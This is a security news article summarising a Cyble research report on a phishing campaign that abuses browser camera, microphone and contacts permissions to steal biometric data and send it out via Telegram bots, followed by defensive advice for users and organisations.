The New Face of Phishing: Hackers Weaponize Browser Prompts to Steal Biometric Data
Do Son 
Malicious Web Interfaces Used for Data Collection | Image: CRIL
A highly active social engineering campaign is rewriting the phishing playbook by shifting its focus from simple passwords to high-value biometric data. According to an executive summary from Cyble Research & Intelligence Labs (CRIL), threat actors have been observed using a sophisticated web-based framework to trick users into granting invasive browser permissions.
Hosted primarily on edgeone.app infrastructure, the campaign uses a diverse array of lures—ranging from “ID Scanners” and “Health Fund AI” to “Telegram ID Freezing” alerts—to create a false sense of urgency.
Unlike traditional phishing sites that rely on typed input, these malicious pages abuse legitimate browser APIs to access a device’s hardware. Once a user clicks “Allow” on a permission prompt, the underlying JavaScript workflow springs into action.
The campaign’s technical execution is both silent and thorough:
- Multimedia Capture: The script initializes a live video stream, “silently captures a frame from the live video stream and exfiltrates it,” along with audio and short video clips.
- Environment Enumeration: Before the camera even activates, the framework performs extensive “device fingerprinting,” gathering data on the operating system, available RAM, CPU cores, and even battery levels.
- Geographic Tracking: By using external APIs like ipapi.co, the attackers enrich stolen data with the victim’s “country, city, latitude, and longitude”.
- Contact Harvesting: In some versions, the script even attempts to use the Contacts Picker API to scrape names, phone numbers, and email addresses from the victim’s contact list.
Researchers at CRIL noted a modern twist in the campaign’s code. The presence of structured annotations and “decorative Unicode symbols” (emojis) within the operational logic suggests that the threat actors may be using generative AI tools to accelerate their development.
For the attackers, the goal is low operational complexity. Instead of building a complex backend, they use the Telegram Bot API as a “streamlined C2 and data exfiltration channel”. This allows stolen JPEG, WebM, and audio files to be transmitted directly to the attacker’s Telegram chat via simple HTTP requests.
The transition from credential theft to harvesting biometric data represents a dangerous evolution in the threat landscape. Because biometric data like facial images and audio samples are “difficult to revoke or replace,” their loss is permanent.
As the CRIL report warns:
“The stolen data can be leveraged to bypass video-KYC and remote identity verification processes, enabling fraudulent account creation, synthetic identity fraud, account takeover, and financial scams… “
Beyond identity theft, these high-resolution images and audio clips are perfect raw material for AI-driven deepfake attacks and extortion schemes.
How to Stay Safe
The campaign often impersonates trusted brands like TikTok, Instagram, and Google Drive to build a facade of legitimacy. To protect yourself and your organization:
- Be Skeptical of Hardware Requests: Legitimate service recovery or verification rarely requires camera or microphone access from an untrusted or unfamiliar domain.
- Audit Browser Permissions: Regularly check which sites have persistent access to your camera and location in your browser settings.
- Report “EdgeOne” Links: Organizations should remain cautious of any verification prompts originating from edgeone.app subdomains.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
